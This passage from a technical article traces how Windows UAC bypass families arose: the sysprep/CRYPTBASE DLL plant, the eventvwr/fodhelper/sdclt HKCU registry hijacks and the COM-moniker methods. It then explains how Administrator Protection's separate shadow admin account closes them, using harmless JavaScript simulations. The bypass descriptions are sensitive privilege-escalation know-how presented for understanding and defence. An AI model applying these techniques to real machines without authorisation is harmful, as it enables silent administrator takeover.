Davidson's technique against the new whitelist is one paragraph of detail. Use the IFileOperation COM elevation moniker, which itself auto-elevates, to write a planted CRYPTBASE.DLL into %SystemRoot%\System32\sysprep\. The path is a writable destination from the limited token because IFileOperation runs elevated. Then launch sysprep.exe, which is auto-elevated as a Microsoft-signed binary in System32. Sysprep loads CRYPTBASE.DLL from its own directory before the system path. The attacker's DLL runs at High integrity in the elevated sysprep process [@davidson-2009, @uacme]. No prompt. The whitelist did the work.
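The load-order step is what makes the technique work, so it is worth modelling in isolation. This is a simplified sketch that assumes only two search locations, the executable's own directory and the system directory; the real Windows loader has more stages (KnownDLLs, side-by-side manifests, and others). The function `resolveDll` and the in-memory "disk" are hypothetical.

```javascript
// Simplified DLL search: the directory of the executable is consulted
// before the system directory. This models only the ordering the
// paragraph above relies on, not the full Windows loader.
function resolveDll(dllName, exeDir, systemDir, filesOnDisk) {
  const candidates = [exeDir, systemDir].map((dir) => `${dir}\\${dllName}`);
  return candidates.find((p) => filesOnDisk.has(p.toLowerCase())) ?? null;
}

const systemDir = 'C:\\Windows\\System32';
const sysprepDir = 'C:\\Windows\\System32\\sysprep';

// "Disk" contents as lower-cased full paths.
const cleanDisk = new Set(['c:\\windows\\system32\\cryptbase.dll']);
const plantedDisk = new Set([
  'c:\\windows\\system32\\cryptbase.dll',
  'c:\\windows\\system32\\sysprep\\cryptbase.dll', // copy written via IFileOperation
]);

const cleanResult = resolveDll('CRYPTBASE.DLL', sysprepDir, systemDir, cleanDisk);
const plantedResult = resolveDll('CRYPTBASE.DLL', sysprepDir, systemDir, plantedDisk);
console.log('clean system loads:  ', cleanResult);
console.log('after planting loads:', plantedResult);
```

Nothing about `sysprep.exe` itself changes between the two calls; only the contents of its directory do.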

The bypass canon. Davidson's technique was the start, not the totality. The successors walked the same shape across families.

The DLL side-load family. Sysprep was the canonical instance. Subsequent variants targeted cliconfg.exe, mcx2prov.exe, migwiz.exe, and setupsqm.exe -- each an auto-elevating Microsoft binary that loaded a DLL from a writable directory before consulting the system path. Microsoft removed the auto-elevation attribute from many of these binaries over the Windows 10 1709 cycle, but did so one binary at a time [@uacme].
The registry-hijack family. Matt Nelson's August 2016 disclosure of an eventvwr.exe plus HKCU\Software\Classes\mscfile\shell\open\command bypass [@enigma0x3-2016-eventvwr] established the pattern. An auto-elevating binary consults HKEY_CURRENT_USER before HKEY_CLASSES_ROOT for a value the binary trusts to dispatch a child process. The limited user, who owns HKCU, writes whatever they want into the value. The elevated binary executes the attacker's command line. March 2017 produced sdclt.exe plus App Paths [@enigma0x3-2017-app-paths] and sdclt.exe plus IsolatedCommand [@enigma0x3-2017-sdclt]; May 2017 produced the fodhelper.exe plus ms-settings variant [@uacme]. All fileless. All generalising to any auto-elevating binary that walks HKCU before HKCR.
The COM-elevation-moniker abuse family. UACMe's Method 1 (Davidson's original IFileOperation) ages into Methods 41 (ICMLuaUtil, Oddvar Moe, via ucmCMLuaUtilShellExecMethod) and 43 (IColorDataProxy paired with ICMLuaUtil, Oddvar Moe derivative, via ucmDccwCOMMethod), each one a different COM interface that auto-elevates and exposes a method useful for arbitrary file or registry write [@uacme].
The environment-variable and path-poisoning family. Per-process %windir% or %SystemRoot% redirection via registry shims and Image File Execution Options, redirecting auto-elevating binaries to load resources from attacker-controlled directories.
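The registry-hijack family in the list above reduces to a lookup-order property, which a few lines can illustrate. This is a sketch under assumptions: hives are modelled as plain `Map` objects, `lookupCommand` is a hypothetical helper, and the command strings are placeholders; only the key path is taken from the text.

```javascript
// Model of a per-user-first class lookup: a value in the user's own hive
// shadows the machine-wide default. Only the key path comes from the text.
function lookupCommand(key, userHive, machineHive) {
  if (userHive.has(key)) return { source: 'HKCU', command: userHive.get(key) };
  if (machineHive.has(key)) return { source: 'HKLM', command: machineHive.get(key) };
  return null;
}

const KEY = 'Software\\Classes\\mscfile\\shell\\open\\command';
const machineHive = new Map([[KEY, 'mmc.exe "%1"']]); // placeholder default
const userHive = new Map(); // writable by the limited user

const beforeWrite = lookupCommand(KEY, userHive, machineHive);
userHive.set(KEY, 'placeholder-user-chosen-command.exe');
const afterWrite = lookupCommand(KEY, userHive, machineHive);

console.log('before user write:', beforeWrite.source, beforeWrite.command);
console.log('after user write: ', afterWrite.source, afterWrite.command);
```

The elevated binary in this model never changes; the value it trusts is simply resolved from a hive the limited user owns.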

Key idea: The Windows 7 auto-elevation whitelist was the bypass. The day Microsoft shipped a class of binaries that could elevate silently based on signing and path, the entire problem of UAC bypass reduced to "make one of those binaries do something the attacker wants it to do." Every UACMe method that targets a Microsoft-signed binary in System32 descends from this design choice. The 81-method catalogue is not a list of separate vulnerabilities; it is one architectural mistake spreading through the binary inventory.

Enter hfiref0x's UACMe [@uacme]. The project has been on GitHub since 2014. It currently lists 81 named methods. Each entry pairs the method number with the author credit, the target binary, the technique class, and the "Fixed in" build number. The README, taken together, is the institutional memory of UAC's failure as a boundary. Forshaw's January 2026 framing is the operational summary: "A good repository of known bypasses is the UACMe tool which currently lists 81 separate techniques for gaining administrator privileges" [@forshaw-pz-jan2026].

Microsoft chose to fix individual bypasses rather than redesign the model. The next section asks whether seven years of fixes ever caught up.

5. 2017-2024: incremental hardening, no convergence

The middle Windows 10 era was the moment Microsoft treated UAC bypasses as a quality problem and shipped fixes at quality-fix cadence, not security-bulletin cadence. The work was real, but it was always one binary or one interface at a time.

The named milestones, kept short.

Windows 10 1709 (October 2017). Beginning with this build, IFileOperation auto-elevation for callers other than Explorer was restricted [@uacme]. The originating Davidson 2009 family of bypasses, against the sysprep + planted-CRYPTBASE shape, ceased to function for processes other than the shell itself.
Tighter appinfo.dll manifest parsing across multiple Windows 10 builds. Stricter binary-signature checks. Stricter path checks. Stricter manifest checks. Each of these closed individual bypass methods; none of them closed a family.
Per-binary hardening recorded in UACMe's "Fixed in" column. UACMe version 3.5.0 retired roughly eighty percent of the 2014-vintage catalogue as obsolete; the v3.2.x branch retains the full historical record. The project's README warns that "since version 3.5.0, all previously 'fixed' methods are considered obsolete and have been removed. If you need them, use v3.2.x branch" [@uacme].
CVE-2019-1388 (November 2019; reporter: Eduardo Braun Prado via Trend Micro's Zero Day Initiative). The lone departure from the "UAC bypasses get no CVE" rule. A UI-interaction path through consent.exe's certificate-viewer dialog: an unsigned application could trigger consent.exe to display a certificate dialog whose "View Certificate" link launched Internet Explorer running as NT AUTHORITY\SYSTEM, and IE's File menu opened cmd.exe at the same integrity level [@nvd-cve-2019-1388]. Microsoft fixed it on the November 2019 Patch Tuesday and gave it an LPE bulletin.

CVE-2019-1388 was a prompt-UI bug -- specifically, a UI-interaction path that surfaced an IE process running as SYSTEM via the certificate viewer -- not a UAC-bypass bug in the categorical sense. The classification distinction matters: Microsoft did not change its position that UAC was not a boundary; the bulletin treated this as a separate UI defect that incidentally crossed the boundary. CISA later added the CVE to the Known Exploited Vulnerabilities Catalog [@nvd-cve-2019-1388].

The accumulating evidence by 2024 was three observations.

UACMe's catalogue has grown from its 2014 origins to 81 methods today [@uacme]. Each family of attack survived the individual fixes. As Davidson predicted in 2009, the auto-elevation whitelist was the structural problem; patching each whitelisted binary as a separate bug was a treadmill, not a convergence.

Microsoft's own Security Servicing Criteria continued to classify UAC as a security feature, not a boundary, throughout the period [@msrc-servicing-criteria, @forshaw-pz-jan2026]. The decision was load-bearing. Fixing the elevation pipeline at quality cadence meant accepting that bypasses would appear quarterly and would not appear in the Patch Tuesday bulletins until the day Microsoft changed its mind about the classification.

The third piece of evidence is what the attackers were doing while the defenders were churning the binary list. Microsoft's own number, quoted by the Windows Developer Blog from the Microsoft Digital Defense Report 2024, is 39,000 token-theft incidents per day [@ms-developer-blog-2025]. A token, once stolen from an elevated process, requires no further bypass: it is a bearer credential good for the lifetime of the logon session. The same logon session is the one the unelevated user and the elevated process share under the split-token model. The "one logon session" property of UAC's design is the structural premise that token theft depends on.

There is one further thread worth naming here. Forshaw's broader 2022 Kerberos work in the user-credential-delegation space survives the elevation-redesign question entirely. The May 2022 post *Exploiting RBCD using a normal user account* [@forshaw-2022-rbcd] is the representative artifact. Network-credential delegation primitives -- Resource-Based Constrained Delegation, User-to-User Kerberos, S4U2Self -- operate at a layer beneath token-level elevation, and survive even a perfect SMAA design because they do not run through the elevation path at all.

Piecewise fixes never converged on a boundary. The question that drove the next five years of Microsoft work was the obvious one: if the issue is the shared-resource model itself, what is the smallest plausible change that fixes it?

6. The breakthrough: the System Managed Administrator Account

The load-bearing design decision is one sentence. Stop trying to make one user account play both roles. The elevated administrator should be a different account with a different SID, a different profile, a different HKCU, a different logon session, and a different DOS device object directory -- and the operating system should manage that account itself.

What is striking about the design is how prosaic the underlying mechanism is. Multi-user accounts have shipped with Windows NT since version 3.1 in 1993. The architecture for running an elevated process under a separate local user has been present in NT for thirty-three years. What changed is that Microsoft finally chose to enforce the multi-user model for privilege separation, by making the operating system itself create and manage the second account, link it to the primary admin via paired Security Account Manager attributes, and use it for every elevation. The sophistication is in linkage, in lifecycle, and in removing auto-elevation, not in any single new primitive.

Note: The thing that changes between UAC and Administrator Protection is not the elevation mechanism (a manifest, a prompt, a CreateProcessAsUser call) but the elevation classification. An elevation bypass used to be a quality bug. It is now a security-bulletin vulnerability. Every Administrator Protection design decision -- separate account, fresh logon session, removed auto-elevation, Hello-gated consent -- is a consequence of the classification change.

The names. Microsoft Learn's term is Administrator Protection [@ms-admin-protection]. Microsoft's announcement material at Ignite 2024 and in the Insider Preview build 27718 post uses the same "Administrator Protection" label [@ms-insider-build-27718]; Adminless is the community shorthand that stuck. The internal engineering term in samsrv.dll (the Security Account Manager service DLL) is ShadowAdmin [@call4cloud-osint]. The Windows Developer Blog's canonical term for the underlying entity is the System Managed Administrator Account (SMAA) [@ms-developer-blog-2025].

System Managed Administrator Account (SMAA): The hidden local user account that Windows creates per primary administrator when the `TypeOfAdminApprovalMode` policy is set to 2. The SMAA has its own random user name (typically `ADMIN_<random>`), its own SID, its own profile directory under `C:\Users\ADMIN_<random>\`, its own `NTUSER.DAT` and therefore its own `HKCU`, and its own membership in the local Administrators group. The operating system uses it to host elevated processes; the user never logs into it directly [@ms-developer-blog-2025, @call4cloud-osint].

The SMAA lifecycle. Four beats. Each anchored to a verified source.

Provisioning. When TypeOfAdminApprovalMode = 2 is set under HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System (either by Group Policy or by the Intune Settings Catalog), samsrv.dll's ShadowAdminAccount::CreateShadowAdminAccount runs once per existing local-administrator account. CreateRandomShadowAdminAccountName produces an ADMIN_<random> name. AddAccountToLocalAdministratorsGroup adds the new account to the Administrators group. Accounts managed by Windows LAPS (Local Administrator Password Solution) are skipped; their lifecycle is owned by a different subsystem and Microsoft did not want the SMAA mechanism to fight LAPS rotation [@call4cloud-osint].
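The provisioning pass can be sketched as a loop over local administrators. This is an illustrative model, not the `samsrv.dll` implementation: `provisionShadowAdmins`, `randomSuffix`, and the `managedByLaps` field are hypothetical names, and the suffix length and character set are assumptions, since the text specifies only the `ADMIN_` prefix.

```javascript
// Sketch of the provisioning pass: one shadow account per local admin,
// skipping LAPS-managed accounts. The suffix format is an assumption.
function randomSuffix(length = 16) {
  let s = '';
  for (let i = 0; i < length; i++) {
    s += Math.floor(Math.random() * 16).toString(16);
  }
  return s;
}

function provisionShadowAdmins(localAdmins) {
  const administratorsGroup = new Set(localAdmins.map((a) => a.name));
  const created = [];
  for (const admin of localAdmins) {
    if (admin.managedByLaps) continue; // LAPS owns this account's lifecycle
    const shadowName = `ADMIN_${randomSuffix()}`;
    administratorsGroup.add(shadowName); // mirrors AddAccountToLocalAdministratorsGroup
    created.push({ primary: admin.name, shadow: shadowName });
  }
  return { created, administratorsGroup };
}

const provisioned = provisionShadowAdmins([
  { name: 'alice', managedByLaps: false },
  { name: 'LapsAdmin', managedByLaps: true },
]);
console.log(provisioned.created);
```

In this model the LAPS-managed account stays in the Administrators group but never receives a shadow counterpart, matching the skip rule described above.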

Linking. Two paired SAM attributes encode the trust relationship between the two accounts. The primary admin's user record gets a ShadowAccountForwardLinkSid attribute pointing at the SMAA's SID. The SMAA's user record gets a ShadowAccountBackLinkSid attribute pointing back at the primary admin. These two attributes are the only structural relationship between the two accounts; everything else -- profile, HKCU, group memberships -- is independent [@call4cloud-osint].
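The paired attributes lend themselves to a two-way check, which the article later describes appinfo performing at elevation time. Below is a minimal sketch of that idea using a toy SAM keyed by SID. The attribute names come from the text; `resolveSmaa`, the SIDs, and the account names are hypothetical.

```javascript
// Toy SAM: user records keyed by SID, carrying the two link attributes
// named in the text. SIDs and account names are placeholders.
function resolveSmaa(sam, primarySid) {
  const primary = sam.get(primarySid);
  if (!primary || !primary.ShadowAccountForwardLinkSid) return null;
  const smaaSid = primary.ShadowAccountForwardLinkSid;
  const smaa = sam.get(smaaSid);
  // Both attributes must point at each other; otherwise refuse.
  if (!smaa || smaa.ShadowAccountBackLinkSid !== primarySid) return null;
  return smaaSid;
}

const sam = new Map([
  ['S-1-5-21-1-2-3-1001', { name: 'alice', ShadowAccountForwardLinkSid: 'S-1-5-21-1-2-3-1051' }],
  ['S-1-5-21-1-2-3-1051', { name: 'ADMIN_example', ShadowAccountBackLinkSid: 'S-1-5-21-1-2-3-1001' }],
  // A record that claims someone else's SMAA: the back link does not match.
  ['S-1-5-21-1-2-3-1002', { name: 'mallory', ShadowAccountForwardLinkSid: 'S-1-5-21-1-2-3-1051' }],
]);

console.log('alice   ->', resolveSmaa(sam, 'S-1-5-21-1-2-3-1001'));
console.log('mallory ->', resolveSmaa(sam, 'S-1-5-21-1-2-3-1002'));
```

A forward link alone is not sufficient in this model: the mismatched back link is what causes the second lookup to be refused.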

ShadowAccountForwardLinkSid / ShadowAccountBackLinkSid: Two paired SAM-database attributes that encode the trust relationship between a primary admin user and its System Managed Administrator Account. The forward link sits on the primary admin's record and points at the SMAA's SID. The back link sits on the SMAA's record and points back at the primary admin. The Application Information service uses the forward link at elevation time to resolve which SMAA to launch the elevated process under [@call4cloud-osint].

TypeOfAdminApprovalMode: The registry value under `HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System` that selects the elevation policy. Value 0 disables UAC. Value 1 selects classic Admin Approval Mode (the Vista / Win7 / Win10 split-token behaviour). Value 2 selects Admin Approval Mode with Administrator Protection: every elevation routes through the SMAA path. The value is set by Group Policy ("User Account Control: Configure type of Admin Approval Mode") or by an Intune Settings Catalog policy and requires a reboot to take effect [@ms-admin-protection, @call4cloud-osint].

Per-elevation use. appinfo.dll's RAiLaunchAdminProcess RPC endpoint reads TypeOfAdminApprovalMode. When the value is 2, it walks the forward link to find the calling user's SMAA, launches consent.exe on the secure desktop in credential prompt mode (not Yes/No), authenticates the primary user via Windows Hello (PIN, fingerprint, face, or password fallback), asks the kernel to ask LSA for a fresh primary token for the SMAA in a brand-new logon session, and calls CreateProcessAsUser with that token, the user's requested executable, and the SMAA's profile environment [@ms-developer-blog-2025, @ms-admin-protection, @forshaw-pz-jan2026]. The credential-less LSA logon at the heart of step three of this beat is walked in §7.

Teardown. When the elevated process exits, the SMAA's token handle goes out of scope. The logon session is reaped. The elevated profile directory remains on disk at C:\Users\ADMIN_<random>\ -- it has to, to preserve per-elevation user state across reboots -- but the live admin token does not. There is no persistent High-integrity process running between elevations [@ms-developer-blog-2025].

flowchart TD
Start[Policy enabled: TypeOfAdminApprovalMode = 2] --> Provision
Provision[samsrv.dll: CreateShadowAdminAccount per local admin] --> Naming
Naming[CreateRandomShadowAdminAccountName -> ADMIN_random] --> AddGroup
AddGroup[AddAccountToLocalAdministratorsGroup] --> Link
Link[SAM linkage: ShadowAccountForwardLinkSid / ShadowAccountBackLinkSid] --> Idle[SMAA exists, no token live]
Idle -->|Each elevation| RPC[appinfo.dll: RAiLaunchAdminProcess]
RPC --> Prompt[consent.exe: Hello credential prompt]
Prompt --> LSA[Kernel asks LSA: credential-less logon for SMAA]
LSA --> Run[CreateProcessAsUser with SMAA token]
Run -->|Process exits| Teardown[Token handle released; logon session reaped]
Teardown --> Idle

Windows creates a temporary isolated admin token to get the job done. This temporary token is immediately destroyed once the task is complete, ensuring that admin privileges do not persist. -- David Weston, Microsoft Ignite 2024 keynote, November 19, 2024 [@bleepingcomputer-2024]

Key idea: The single design decision behind Administrator Protection: the elevated and unelevated halves of an administrator must be different accounts. Different SID, different profile, different HKCU, different logon session, different DOS device object directory. The shared-resource attacks of the UAC bypass canon cannot persist if there are no shared resources.

The mechanism is now described. The next section walks it at function-name granularity for a single elevation, end to end -- and in particular, the credential-less LSA logon at step six that does the load-bearing work of minting the SMAA token without any SMAA credential.

7. The elevation pipeline end to end

Walk a single elevation. Nine steps.

The caller invokes ShellExecute or CreateProcess with an elevation request. For the shell-launched case the user right-clicks an executable and selects "Run as administrator"; the same RPC endpoint serves manifest-declared requestedExecutionLevel = "requireAdministrator" callers and Elevation:Administrator!new:<CLSID> COM moniker requests.
appinfo.dll's RAiLaunchAdminProcess RPC endpoint, hosted inside the Application Information service in svchost.exe, receives the call [@ms-uac-how-it-works].
appinfo reads HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\TypeOfAdminApprovalMode.
If the value is 2 (Admin Approval Mode with Administrator Protection), appinfo reads the calling user's SAM record, locates the ShadowAccountForwardLinkSid attribute, and validates the corresponding ShadowAccountBackLinkSid on the SMAA's SAM record. The linkage check is what binds a given elevated process to a given primary user; without both attributes pointing at each other, the elevation is refused [@call4cloud-osint].
appinfo launches consent.exe on the secure desktop in credential prompt mode rather than the classic Yes/No mode. The prompt asks the primary user to authenticate via Windows Hello (PIN, fingerprint, face, or password fallback), not the SMAA. The SMAA has no human credentials. The Windows Developer Blog states the property explicitly [@ms-developer-blog-2025], and Forshaw's January 2026 post restates it in operational terms: "The user does not need to know the credentials for the shadow administrator as there aren't any. Instead UAC can be configured to prompt for the limited user's credentials, including using biometrics if desired" [@forshaw-pz-jan2026].
On a positive Hello result, appinfo.dll -- running as NT AUTHORITY\SYSTEM inside the Application Information service -- asks the kernel to ask LSA for a fresh primary access token for the SMAA's SID in a brand-new logon session. The LSA logon is credential-less. The kernel asks LSA to authenticate "a new instance of the shadow administrator," and LSA fulfils the request without any SMAA credential because the SMAA has no credential to verify. The trust architecture mirrors the way the Service Control Manager asks LSA for service-account tokens: SCM is trusted to ask for the token; LSA mints it on the strength of the request rather than on the strength of any credential. In Administrator Protection, appinfo.dll is the trusted requester, and its request is gated on the user-side Hello result it received in step 5. The Forshaw verbatim that anchors the mechanism is below this section [@forshaw-pz-jan2026, @ms-developer-blog-2025].
appinfo calls CreateProcessAsUser with the SMAA token, the user's requested executable, and the SMAA's profile environment block (USERPROFILE=C:\Users\ADMIN_<random>, USERNAME=ADMIN_<random>, the SMAA's NTUSER.DAT mapped as HKCU).
The new process loads at High integrity, holding the SMAA's primary token, in a fresh logon session with a freshly minted authentication-ID LUID. The DOS device directory at \Sessions\0\DosDevices\<LUID> does not yet exist; the kernel will create it on first reference.
Subsequent SeAccessCheck calls on system objects evaluate against the SMAA's local Administrators group membership and succeed. The elevated process can write to HKLM, modify program files, install services, load WHQL-signed drivers (subject to App Control for Business and HVCI), and otherwise behave as a member of the Administrators group [@ms-developer-blog-2025].
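The steps above can be condensed into a single simulated function, which makes the order of the gates easier to see. This is a model under stated assumptions and calls no Windows API: `elevate`, `verifyHello`, the `forwardLink` / `backLink` fields, the placeholder SIDs, and the LUID counter are all hypothetical stand-ins for the real mechanisms.

```javascript
// End-to-end model of the steps above. Every function and field name is
// illustrative; nothing here touches the operating system.
let nextLuid = 0xabf00;

function elevate(request, system) {
  if (system.typeOfAdminApprovalMode !== 2) {
    return { ok: false, reason: 'Administrator Protection not enabled' };
  }
  // Resolve the forward link and validate the back link.
  const primary = system.sam.get(request.callerSid);
  const smaaSid = primary && primary.forwardLink;
  const smaa = smaaSid && system.sam.get(smaaSid);
  if (!smaa || smaa.backLink !== request.callerSid) {
    return { ok: false, reason: 'SAM linkage check failed' };
  }
  // The credential prompt authenticates the primary user, not the SMAA.
  if (!system.verifyHello(request.callerSid)) {
    return { ok: false, reason: 'Hello verification failed' };
  }
  // Credential-less logon: a fresh session and LUID for every elevation.
  const token = { sid: smaaSid, luid: nextLuid++, integrity: 'High' };
  return {
    ok: true,
    process: {
      image: request.executable,
      token,
      env: { USERNAME: smaa.name, USERPROFILE: `C:\\Users\\${smaa.name}` },
    },
  };
}

const system = {
  typeOfAdminApprovalMode: 2,
  sam: new Map([
    ['SID-alice', { name: 'alice', forwardLink: 'SID-smaa' }],
    ['SID-smaa', { name: 'ADMIN_example', backLink: 'SID-alice' }],
  ]),
  verifyHello: (sid) => sid === 'SID-alice', // stand-in for the Hello gesture
};

const first = elevate({ callerSid: 'SID-alice', executable: 'cmd.exe' }, system);
const second = elevate({ callerSid: 'SID-alice', executable: 'cmd.exe' }, system);
console.log(first.process.token.sid, first.process.env.USERPROFILE);
console.log('fresh LUID per elevation:', first.process.token.luid !== second.process.token.luid);
```

Note that no SMAA credential appears anywhere in the model: the only authentication is of the primary user, and the token is minted because the requester is trusted.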

Credential-less LSA logon: The mechanism by which the Local Security Authority mints a primary access token for the SMAA without verifying any SMAA credential. `appinfo.dll`, running as `NT AUTHORITY\SYSTEM` inside the Application Information service, requests the logon on the SMAA's behalf after the primary user has succeeded against the Hello credential gate. LSA fulfils the request because the *requester* is trusted; the architecture mirrors the way the Service Control Manager requests service-account tokens. The "credential-less" label is descriptive of the SMAA side of the exchange: the SMAA never has a human credential to verify, so LSA cannot and does not ask for one [@forshaw-pz-jan2026, @ms-developer-blog-2025].

The trust architecture is not new in Administrator Protection. The Service Control Manager has asked LSA for service-account tokens since Windows NT 3.1 in 1993; LSA accepts the request because SCM is the trusted requester, not because the service account presented a credential. Administrator Protection generalises the same pattern to elevation: appinfo.dll is the trusted requester, and the SMAA is its functional analogue of a service account. What is new is the user-side gate -- the trusted requester only makes the request after a positive Hello result on the primary user's credential.

in Administrator Protection the kernel calls into the LSA and authenticates a new instance of the shadow administrator. This results in every token returned from `TokenLinkedToken` having a unique logon session, and thus does not currently have the DOS device object directory created. -- James Forshaw, *Bypassing Windows Administrator Protection*, Google Project Zero, January 26, 2026 [@forshaw-pz-jan2026]

The "unique logon session" property in Forshaw's quote is exactly the structural property the lazy-DOS-device-directory bypass exploits, and §12 walks that exploit in full. For now, the load-bearing observation is the credential-less logon itself: the SMAA token is real, the logon session is real, the integrity level is real, but no SMAA credential ever changes hands. The trust is in the requester, gated by a Hello gesture from the primary user.

sequenceDiagram
participant User as User shell (primary admin filtered token)
participant AppInfo as appinfo.dll (NT AUTHORITY\SYSTEM)
participant SAM as samsrv.dll / SAM database
participant Consent as consent.exe (secure desktop)
participant Hello as Windows Hello / TPM
participant LSA as LSASS
participant Elev as Elevated SMAA process

User->>AppInfo: ShellExecute "as admin"
AppInfo->>AppInfo: RAiLaunchAdminProcess RPC
AppInfo->>AppInfo: Read TypeOfAdminApprovalMode = 2
AppInfo->>SAM: Resolve ShadowAccountForwardLinkSid
SAM-->>AppInfo: SMAA SID + backlink check OK
AppInfo->>Consent: Launch consent.exe (credential mode)
Consent->>Hello: Request Hello gesture for primary user
Hello-->>Consent: PIN / biometric / password verified
Consent-->>AppInfo: Approved
AppInfo->>LSA: Credential-less logon for SMAA (trusted-requester pattern)
LSA-->>AppInfo: Fresh SMAA primary token and fresh LUID
AppInfo->>Elev: CreateProcessAsUser with SMAA token and profile
Note over Elev: Different SID and USERPROFILE and HKCU and LUID
Note over Elev: Integrity level High -- DOS device dir not yet created

A practical illustration of the shift, displayed as the diff between the pre-AP and post-AP elevated console session.

{`
// Modelled output of 'whoami /all' run from an elevated console.
// Before: TypeOfAdminApprovalMode = 1 (classic UAC).
// After: TypeOfAdminApprovalMode = 2 (Administrator Protection).

const before = {
  user: 'CONTOSO\\alice',
  sid: 'S-1-5-21-123456789-987654321-1122334455-1001',
  profile: 'C:\\Users\\alice',
  authId: '0x3e7:0x000abcde',
  integrity: 'S-1-16-12288 (High)',
  groups: ['BUILTIN\\Administrators (Enabled)']
};

const after = {
  user: 'WIN11-PC\\ADMIN_9f2c7e1bdc4a8033',
  sid: 'S-1-5-21-123456789-987654321-1122334455-1051',
  profile: 'C:\\Users\\ADMIN_9f2c7e1bdc4a8033',
  authId: '0x3e7:0x000abf42',
  integrity: 'S-1-16-12288 (High)',
  groups: ['BUILTIN\\Administrators (Enabled)'],
  shadowBacklink: 'CONTOSO\\alice'
};

// Everything that identifies the account differs; only the integrity level matches.
console.log('Different user name:', before.user !== after.user);
console.log('Different SID:', before.sid !== after.sid);
console.log('Different profile:', before.profile !== after.profile);
console.log('Different LUID:', before.authId !== after.authId);
console.log('Same integrity:', before.integrity === after.integrity);
`}

The pipeline is now a single chain of named function calls. The next section asks what changed about the four shared-resource properties from §3, and which UAC-bypass family each fix forecloses.

8. The four shared-resources fixes, precisely

Each of the four shared resources from §3 maps to a precise Administrator Protection fix, and each fix maps to a named UAC-era attack class it forecloses.

| Shared resource (UAC) | Administrator Protection fix | UAC-era attack class foreclosed |
| --- | --- | --- |
| Same SID across both tokens | SMAA has its own SID; no shared user identity | Same-user file and registry ACE confusion |
| Same `%USERPROFILE%` | SMAA has `C:\Users\ADMIN_<random>\` | DLL side-load family (sysprep / CRYPTBASE) |
| Same `HKCU` hive | SMAA has its own `NTUSER.DAT` | Registry-hijack family (eventvwr, fodhelper, sdclt) |
| Same logon-session LUID | SMAA gets a fresh LUID per elevation | Token-theft via `TokenLinkedToken`; logon-session DOS device hijack |

Profile separation. The SMAA owns its own %USERPROFILE% directory tree under C:\Users\ADMIN_<random>\. Files created by elevated processes land there by default. Library folder divergence is the most visible consequence: an elevated Notepad's File > Save dialog opens at the SMAA's Documents, not the primary user's. The primary user cannot see those files in their own Explorer without explicit cross-profile navigation. The structural property that closes is the writable-shared-directory premise of the Davidson 2009 DLL side-load family. Sysprep + CRYPTBASE was a profile-shared attack; without a shared profile, the elevated binary searches a different directory tree from the one the limited user can write to [@ms-developer-blog-2025].

Registry separation. The SMAA's HKCU maps to the SMAA's NTUSER.DAT, not the primary user's. When eventvwr.exe, running in an SMAA process, queries HKCU\Software\Classes\mscfile\shell\open\command, it reads the SMAA's hive, not the primary user's. The primary user has no write access to the SMAA's NTUSER.DAT. The entire registry-hijack family -- eventvwr / mscfile [@enigma0x3-2016-eventvwr], fodhelper / ms-settings, sdclt / IsolatedCommand [@enigma0x3-2017-sdclt], sdclt / App Paths [@enigma0x3-2017-app-paths] -- forecloses on the same property: the elevated binary's HKCU lookup walks a hive the attacker does not control [@ms-developer-blog-2025].
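The effect of giving the elevated process its own hive can be shown by resolving the same key as two different accounts. This is a sketch under assumptions: each hive is a plain `Map`, `readAsProcess` is a hypothetical helper, and the account names and command strings are placeholders; only the key path is taken from the text.

```javascript
// Each account has its own hive; HKCU resolves against the hive of the
// account the process runs as. Names and commands are illustrative.
const KEY = 'Software\\Classes\\mscfile\\shell\\open\\command';
const machineDefault = 'mmc.exe "%1"'; // placeholder machine-wide value
const hives = new Map([
  ['alice', new Map()],         // primary user's NTUSER.DAT
  ['ADMIN_example', new Map()], // SMAA's NTUSER.DAT
]);

function readAsProcess(runAsAccount, key) {
  const hkcu = hives.get(runAsAccount);
  return hkcu.has(key) ? hkcu.get(key) : machineDefault;
}

// The limited user can write only to their own hive.
hives.get('alice').set(KEY, 'placeholder-user-chosen-command.exe');

// Classic UAC: the elevated process runs as the same account.
const classicUac = readAsProcess('alice', KEY);
// Administrator Protection: the elevated process runs as the SMAA.
const adminProtection = readAsProcess('ADMIN_example', KEY);

console.log('classic UAC reads:             ', classicUac);
console.log('Administrator Protection reads:', adminProtection);
```

The write that redirects the classic lookup lands in a hive the SMAA process never consults.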

Logon-session separation. Every SMAA elevation gets a fresh authentication-ID LUID. The Local Security Authority allocates a new logon session for each elevation; when the elevated process exits, the session is reaped. Per-logon-session kernel resource caches, including the DOS device object directory at \Sessions\0\DosDevices\<LUID> and the credential cache, do not flow across the boundary. Token handles cannot be reused. Drive-letter overrides under the limited user's logon session do not appear in the SMAA's session [@forshaw-pz-jan2026].
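The per-session isolation described above can be modelled with a small session table. This is an illustrative sketch only: `SessionManager` and its methods are hypothetical, LUIDs are plain counters, and the drive-letter target is a made-up path; no kernel behaviour is invoked.

```javascript
// Model: every elevation gets a new logon session (LUID); the per-session
// DOS device directory is created lazily on first reference and is never
// shared across sessions.
class SessionManager {
  constructor() {
    this.next = 1;
    this.dosDeviceDirs = new Map(); // LUID -> Map(driveLetter -> target)
  }
  newLogonSession() {
    return this.next++;
  }
  dosDevicesFor(luid) {
    if (!this.dosDeviceDirs.has(luid)) this.dosDeviceDirs.set(luid, new Map());
    return this.dosDeviceDirs.get(luid);
  }
  reap(luid) {
    this.dosDeviceDirs.delete(luid);
  }
}

const sessions = new SessionManager();

// The limited user defines a drive-letter override in their own session.
const userLuid = sessions.newLogonSession();
sessions.dosDevicesFor(userLuid).set('Z:', '\\??\\C:\\Users\\alice\\redirect');

// An elevation gets a different LUID and therefore a different directory.
const elevatedLuid = sessions.newLogonSession();
const overrideVisible = sessions.dosDevicesFor(elevatedLuid).has('Z:');
console.log('user drive override visible in elevated session:', overrideVisible);

sessions.reap(elevatedLuid); // process exit: the session's state is discarded
```

The lazy creation in `dosDevicesFor` mirrors the text's observation that the directory does not exist until first referenced.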

